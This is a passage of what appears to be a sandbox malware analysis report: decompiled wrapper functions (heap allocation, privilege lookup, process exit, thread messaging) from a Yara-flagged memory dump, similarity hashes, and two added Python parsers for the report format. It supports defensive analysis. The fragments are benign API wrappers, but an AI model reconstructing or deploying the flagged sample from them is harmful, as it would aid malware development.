0x004072aa      if(_t25 != 0) {
0x004072ad          _t21 = _a8;
0x004072ba          _t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed   -- 0x111 = WM_COMMAND, posted to the thread id in _a8
0x004072bc          _t32 = _t14;
0x004072be          if(_t14 == 0) {   // fallback only when the post failed: call the resolved function with the thread id and 0x8003
0x004072db              _t14 = *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
0x004072db          }
0x00000000          return _t14;
0x004072dd      }
0x004072e2      return _t13;
            }

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                        • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction ID: 6b0ef71fbeaf951b2b192601ca4f65d9d553c49989ddfcc0cd121bd0f41b632b
                                                                        • Opcode Fuzzy Hash: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction Fuzzy Hash: 9EE092361002046FE620EBA89C48DEB776CDF84360F40C959FD1DD7242C536D9548690
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 27%
            E00418503(intOrPtr _a4, int _a8) {
                intOrPtr _v117;
                void* _t16;
                int _t17;
                void* _t18;

                // The prologue through clc is misdecoded bytes rather than code that runs (hlt faults in user
                // mode, and popad/cmc/clc make no sense here). The ExitFreeHeapProcess record above lists
                // RtlFreeHeap at 004184FD and ExitProcess at 00418538, on either side of this start address,
                // so the decompiler has cut into the middle of that routine; only the tail from 0x00418513 on
                // is meaningful, and it follows the same pre-call pattern as E00418490 and E00418630.
0x00418503      asm("adc esi, eax");
0x00418505      asm("stosb");
0x00418506      asm("hlt");
0x00418507      asm("popad");
0x0041850d      asm("cmc");
0x0041850e      asm("clc");
0x0041850f      _v117 = _v117 - _t16;
0x00418513      _t12 = _a4;
0x0041852a      E00418DC0(_t18, _a4, _a4 + 0xc7c, *((intOrPtr*)(_t12 + 0xa14)), 0, 0x36);   // index 0x36 before ExitProcess
0x0041852f      _t17 = _a8;
0x00418533      _push(es);
0x00418538      ExitProcess(_t17);
            }

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: af1e9313bf940d0d5cbf78baa0390432db323990f6fd7632f32c5f1c169f9e6c
                                                                        • Instruction ID: 7612a0f33aa6b85dc941dc66adbce5e7c57cb60b2627193452cc7e97de4f2b44
                                                                        • Opcode Fuzzy Hash: af1e9313bf940d0d5cbf78baa0390432db323990f6fd7632f32c5f1c169f9e6c
                                                                        • Instruction Fuzzy Hash: 17E04F35A002107FD724CF75CC49FD777A8AF59750F158569F909A7282C631AA11CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
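The function records on this page follow one shape: an "APIs" list with one call site per line ("• RtlFreeHeap.NTDLL(...), ref: 004184FD"), then the memory-dump source, the similarity fields and the fuzzy hashes. When a report runs to thousands of such records, the first thing a reviewer wants is a per-function call map and a list of call sites that several records claim, since that is the usual sign that the decompiler split one routine into overlapping fragments (as the 27%-quality E00418503 fragment above suggests). The parser below is an added example, not part of the sandbox output or of the sample: the REPORT excerpt is constructed from the API lines of the records on this page, and the regular expressions are assumptions about the export layout.

```python
"""Parse sandbox function records ("APIs" / "Memory Dump Source" / "Similarity"
blocks) into a per-function map of API call sites.

Added example; not part of the report or of the sample. REPORT is a constructed
excerpt copied from the records on this page; the line patterns are assumptions
about the export format.
"""
import re
from collections import defaultdict

REPORT = """\
APIs
• RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
Memory Dump Source
• Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExitFreeHeapProcess
• API String ID: 1180424539-0
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
Memory Dump Source
• Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePostThread
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
Similarity
• API ID: ExitProcess
APIs
• RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
Similarity
• API ID: FreeHeap
APIs
• RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
Similarity
• API ID: AllocateHeap
"""

# "• Api.MODULE(arg,arg,...), ref: 00418538"  (assumed layout of an API line)
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# "• Key: value" for the metadata bullets (Source File, API ID, ...)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_records(text):
    """Split the export into records; each record starts at an 'APIs' header line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "fields": {}}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers such as "Memory Dump Source" carry no data themselves
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur["calls"].append({"api": m.group("api"), "module": m.group("module"),
                                 "ref": int(m.group("ref"), 16), "args": args})
            continue
        f = FIELD_LINE.match(line)
        if f:
            cur["fields"][f.group("key").strip()] = f.group("val").strip()
    return records


def calls_by_ref(records):
    """Call-site address -> set of record indices that list it."""
    owners = defaultdict(set)
    for i, rec in enumerate(records):
        for call in rec["calls"]:
            owners[call["ref"]].add(i)
    return owners


def shared_call_sites(records):
    """Call sites claimed by more than one record: overlapping or split functions."""
    return {ref: sorted(idx) for ref, idx in calls_by_ref(records).items() if len(idx) > 1}


def api_summary(records):
    """Distinct (module, api) pairs reached anywhere in the parsed records."""
    return sorted({(c["module"], c["api"]) for r in records for c in r["calls"]})


if __name__ == "__main__":
    recs = parse_records(REPORT)
    for i, r in enumerate(recs):
        names = ", ".join(f"{c['api']}@{c['ref']:08X}" for c in r["calls"])
        print(f"record {i} ({r['fields'].get('API ID', '?')}): {names}")
    for ref, idx in shared_call_sites(recs).items():
        print(f"call site {ref:08X} is listed by records {idx}")
```

Run against the excerpt, the shared-call-site check reports 004184FD (RtlFreeHeap) as listed by records 0 and 3 and 00418538 (ExitProcess) by records 0 and 2, i.e. the ExitFreeHeapProcess record and the two single-API records overlap, which is consistent with the E00418503 fragment being a misaligned entry into the same routine. Feeding the full export through the same parser gives the complete call map without reading every record by hand.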

C-Code - Quality: 100%
            E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                void* _t10;
                void* _t15;

                // Thin API wrapper: E00418DC0 is called on the context in _a4 with a per-API index (0x34 here,
                // 0x36 before ExitProcess in E00418503, 0x46 before LookupPrivilegeValueW in E00418630) and
                // the real API is invoked immediately afterwards with the caller's arguments passed through.
0x004184a7      E00418DC0(_t15, _a4, _a4 + 0xc70, *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
0x004184bd      _t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed   -- (HeapHandle, Flags, Size)
0x004184c1      return _t10;
            }

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                        				WCHAR* _t9;
                                                                        				int _t10;
                                                                        				WCHAR* _t12;
                                                                        				void* _t15;
                                                                        
                                                                        				// Pre-call helper used by every API wrapper in this dump: takes the
                                                                        				// context base (_a4), an offset into it, a field read from it and two
                                                                        				// constants. What it does is not resolved in the dump.
                                                                        				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                        				_t9 = _a12;   // lpName: name of the privilege to look up
                                                                        				_t12 = _a8;   // lpSystemName
                                                                        				_push(_a16);  // lpLuid: pushed first, so it is the last (third) argument
                                                                        				_t10 = LookupPrivilegeValueW(_t12, _t9, _a16); // executed; third argument recovered from the push above
                                                                        				return _t10;
                                                                        			}
                                                                        
                                                                        Instruction addresses: 0x0041864a, 0x00418652, 0x00418655, 0x0041865b, 0x00418660, 0x00418664

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00418510(intOrPtr _a4, int _a8) {
                                                                        				intOrPtr _t5;
                                                                        				int _t9;
                                                                        				void* _t10;
                                                                        
                                                                        				_t5 = _a4;
                                                                        				// Same pre-call helper as in the other wrappers, with a different
                                                                        				// offset, field and constants.
                                                                        				E00418DC0(_t10, _a4, _t5 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                        				_t9 = _a8;        // uExitCode
                                                                        				_push(es);        // push of a segment register kept by the decompiler; nothing consumes it
                                                                        				ExitProcess(_t9); // does not return
                                                                        			}
                                                                        
                                                                        Instruction addresses: 0x00418513, 0x0041852a, 0x0041852f, 0x00418533, 0x00418538

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 450b0ddc31c02040fcff75c0ba190ef58751158cd5e3f9bb4a27aca8c368c535
                                                                        • Instruction ID: 1b662230a92e73243f72f8cef25aac30f153e21756c1618354ba40962780a6a5
                                                                        • Opcode Fuzzy Hash: 450b0ddc31c02040fcff75c0ba190ef58751158cd5e3f9bb4a27aca8c368c535
                                                                        • Instruction Fuzzy Hash: 5CB09B719025C5C5E611E760470871779447BD0745F1AC051D1020645A4778C091F5B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

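The "APIs" and "Memory Dump Source" entries are the parts of each function block that survive well enough to triage in bulk. The following Python script is an added example and is not part of the Joe Sandbox report: it parses those two entry types into records (API, module, recovered arguments, call-site address, source dump), attaches each call to the dump it was found in, computes the call-site RVA relative to the dump base, counts the arguments the sandbox printed as "?", and rolls the result up by module and by a coarse behaviour tag. The sample text is copied from the four blocks above. The BEHAVIOUR_TAGS table is an assumed mapping chosen for illustration, and the parser assumes the report keeps the exact bullet layout shown on this page.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: the API and Memory Dump Source entries copied from the
# function blocks of this report (analysis ID 411746).
SAMPLE_REPORT = """\
APIs
• RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
Memory Dump Source
• Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
Memory Dump Source
• Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
Memory Dump Source
• Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
APIs
Memory Dump Source
• Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
"""

# "• Api.MODULE(arg,arg,...), ref: ADDRESS"
API_RE = re.compile(
    r"^\u2022\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Source File: <dump>, Offset: <base>, based on PE: true"
SRC_RE = re.compile(
    r"^\u2022\s*Source File:\s*(?P<file>[^,\s]+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+)"
)

# Assumed tag table (not from the report): maps an API name to a coarse
# behaviour label so a long report can be summarised at a glance.
BEHAVIOUR_TAGS: Dict[str, str] = {
    "RtlAllocateHeap": "heap-alloc",
    "LookupPrivilegeValueW": "privilege-lookup",
    "ExitProcess": "process-exit",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # virtual address of the call site
    dump_file: Optional[str] = None
    dump_base: Optional[int] = None

    @property
    def rva(self) -> Optional[int]:
        """Call-site offset from the dump base, or None if no dump was attached."""
        return None if self.dump_base is None else self.ref - self.dump_base

    @property
    def unresolved_args(self) -> int:
        """Argument slots the sandbox could not recover, printed as '?'."""
        return sum(1 for a in self.args if a == "?")


def parse_report(text: str) -> List[ApiCall]:
    """Extract API calls and attach each to the Source File line that follows it."""
    calls: List[ApiCall] = []
    pending: List[ApiCall] = []       # calls seen since the last Source File line
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            call = ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
            pending.append(call)
            calls.append(call)
            continue
        m = SRC_RE.match(line)
        if m:
            for call in pending:
                call.dump_file = m.group("file")
                call.dump_base = int(m.group("offset"), 16)
            pending = []
    return calls


def summarize(calls: List[ApiCall]) -> Dict[str, object]:
    """Roll calls up by module and behaviour tag, and count unrecovered arguments."""
    return {
        "calls": len(calls),
        "by_module": dict(Counter(c.module for c in calls)),
        "tags": sorted({BEHAVIOUR_TAGS[c.api] for c in calls if c.api in BEHAVIOUR_TAGS}),
        "untagged_apis": sorted({c.api for c in calls if c.api not in BEHAVIOUR_TAGS}),
        "unresolved_args": sum(c.unresolved_args for c in calls),
        "total_args": sum(len(c.args) for c in calls),
    }


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for c in parsed:
        rva = f"{c.rva:X}" if c.rva is not None else "n/a"
        print(f"{c.api}.{c.module} @ {c.ref:08X} (rva {rva}) "
              f"{c.unresolved_args}/{len(c.args)} args unresolved, dump {c.dump_file}")
    print(summarize(parsed))
```

Running the script prints one line per call and a summary dictionary. On the sample, 14 of the 28 argument slots are "?", which is worth checking before treating any value in these entries as a recovered parameter; the block with no API line (the InitializeThunk block from the 03900000 dump) yields no call and is simply skipped.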
                                                                        Non-executed Functions

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56763030843d710986a58f25acea4411a4f91902a0eb6699e7c137fd9d3ac9d8
                                                                        • Instruction ID: a2ec70b76e3044428e3f812f90580699b0032b044476cb899916eb4971d8f47d
                                                                        • Opcode Fuzzy Hash: 56763030843d710986a58f25acea4411a4f91902a0eb6699e7c137fd9d3ac9d8
                                                                        • Instruction Fuzzy Hash: 65E02631D483168AC700DE3DD8C01A0FFF0F902614F403396C980AB112D720E06EC3CA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040C3EA(void* __eax, void* __ecx, void* __edi) {
                                                                        
                                                                        				return __eax;
                                                                        			}
                                                                        
                                                                        Instruction address: 0x0040c3fd

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 759ec3af488aa0e76018513baadbd5b58d62fddc567fd3609b43c8825e07229d
                                                                        • Instruction ID: fb0cead0b4c04b3ea901532f6d15d2301e42e10be854471bd1e7cc3368059846
                                                                        • Opcode Fuzzy Hash: 759ec3af488aa0e76018513baadbd5b58d62fddc567fd3609b43c8825e07229d
                                                                        • Instruction Fuzzy Hash: C7B09227E949050151184C4AB401274F3A4E3C7077A1032BFEE0CF39824E128425058C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f74e471630732bbe91e42b6eb12f4d3784b38df302d116c2bddecde91326cfce
                                                                        • Instruction ID: 1ff8c891469b7e2b234e308124de7adcf6208c02cb287e74bf175d0361c832a9
                                                                        • Opcode Fuzzy Hash: f74e471630732bbe91e42b6eb12f4d3784b38df302d116c2bddecde91326cfce
                                                                        • Instruction Fuzzy Hash: 4C90027120158402E140B159844460B5045ABE0741F55C411E0416558C87558856A261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 418916a2f40b4a50faa2635102f445ce52eced89e1b3191af616e0cdb26b462e
                                                                        • Instruction ID: 3bc0c3d255e4c6f872eaaaa35ec8245907cac8683e5543b33938dd533257f589
                                                                        • Opcode Fuzzy Hash: 418916a2f40b4a50faa2635102f445ce52eced89e1b3191af616e0cdb26b462e
                                                                        • Instruction Fuzzy Hash: 7F90026124114C02E140B15984147070046DBD0A41F55C011A0015558D8756896576F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d53939ce73aa94a7938cf9eb53b4a527f6b23f7af1e3fcbf8dcafb185136d9c
                                                                        • Instruction ID: 637196c8af5cf0e28a20c94d851b2fb3cab9665844dd1364bdefb5789e969f16
                                                                        • Opcode Fuzzy Hash: 1d53939ce73aa94a7938cf9eb53b4a527f6b23f7af1e3fcbf8dcafb185136d9c
                                                                        • Instruction Fuzzy Hash: 1A90026120158842E140A2594804B0F41459BE1642F95C019A4147558CCA5588556761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbe512d9f55ec954da5332818a6b298643dcbf731d8718c0cffcb115140b89d8
                                                                        • Instruction ID: 136c5498b8d1a38d9ab032654e34bcb3d2c96848450d553c0fc1293b2e6919ba
                                                                        • Opcode Fuzzy Hash: fbe512d9f55ec954da5332818a6b298643dcbf731d8718c0cffcb115140b89d8
                                                                        • Instruction Fuzzy Hash: C990027120154802E100A159480874700459BD0742F55C011A5155559E87A5C8917571
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e83e1ea7c96312dc2512a2e9fd85131c235a0e66c2baa18a777a3087efd21f2c
                                                                        • Instruction ID: 6a11d5abd3f48205353a641790aa3f7965d80110af181429608de660e14eba1b
                                                                        • Opcode Fuzzy Hash: e83e1ea7c96312dc2512a2e9fd85131c235a0e66c2baa18a777a3087efd21f2c
                                                                        • Instruction Fuzzy Hash: BB9002A121114442E104A159440470600859BE1641F55C012A2145558CC6698C616165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5710d4c168dca3a896dbf4d8d13cd31305218d7560fcb90c1e9ddda5cfd963a
                                                                        • Instruction ID: 2d29e5fc5ac0b877fad4fb0d47e22b385bf41ae288dba99bbd9c5cdb42ee282c
                                                                        • Opcode Fuzzy Hash: d5710d4c168dca3a896dbf4d8d13cd31305218d7560fcb90c1e9ddda5cfd963a
                                                                        • Instruction Fuzzy Hash: BB9002A120154803E140A559480460700459BD0742F55C011A2055559E8B698C517175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af43f8298fbb7d9d5a9d459505a90d08ce1b3bab1d79c0387566e023b787bde9
                                                                        • Instruction ID: 2f38cae99ef20eb4e14033178b8b3ea2a29dfc50adba13f1549811ec4df006ca
                                                                        • Opcode Fuzzy Hash: af43f8298fbb7d9d5a9d459505a90d08ce1b3bab1d79c0387566e023b787bde9
                                                                        • Instruction Fuzzy Hash: 0F90026130114802E102A15944146060049DBD1785F95C012E1415559D87658953B172
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b6341e74ca2323b7537196165cdbd39c272c74948b36a2d7a7a3672ef42346b
                                                                        • Instruction ID: c0c6afcbec02bf53ff7372fa1c8fb25914603b185c46ddbbc182e169c0ee5fbc
                                                                        • Opcode Fuzzy Hash: 2b6341e74ca2323b7537196165cdbd39c272c74948b36a2d7a7a3672ef42346b
                                                                        • Instruction Fuzzy Hash: 1290027124114802E141B15944046060049ABD0681F95C012A0415558E87958A56BAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4679f06408e1749dc311d1a30fc20168e37427a0c7aeb75d218c9753e7f29150
                                                                        • Instruction ID: e00bd170008765403f5fe0f1e1c9167919c30fff4593a3060f2c2e3dd655eef1
                                                                        • Opcode Fuzzy Hash: 4679f06408e1749dc311d1a30fc20168e37427a0c7aeb75d218c9753e7f29150
                                                                        • Instruction Fuzzy Hash: CD9002A1601284435540F15948044065055ABE1741395C121A0445564C87A88855A2A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c91f52fb24556d653597ef05b02c587b836f7559f01d43576544a3bb3d97660
                                                                        • Instruction ID: 8bad915695a50d081c59aa64ed1febf1c2a02efd2530f1eeae16535c482956cb
                                                                        • Opcode Fuzzy Hash: 7c91f52fb24556d653597ef05b02c587b836f7559f01d43576544a3bb3d97660
                                                                        • Instruction Fuzzy Hash: 6A90027130114452A500E6995804A4A41459BF0741B55D015A4005558C869488616161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4e4bf7a11cb8b54cb1afd279b96ece4d911d0a0e9b76a0b7a03511da7c90d9e
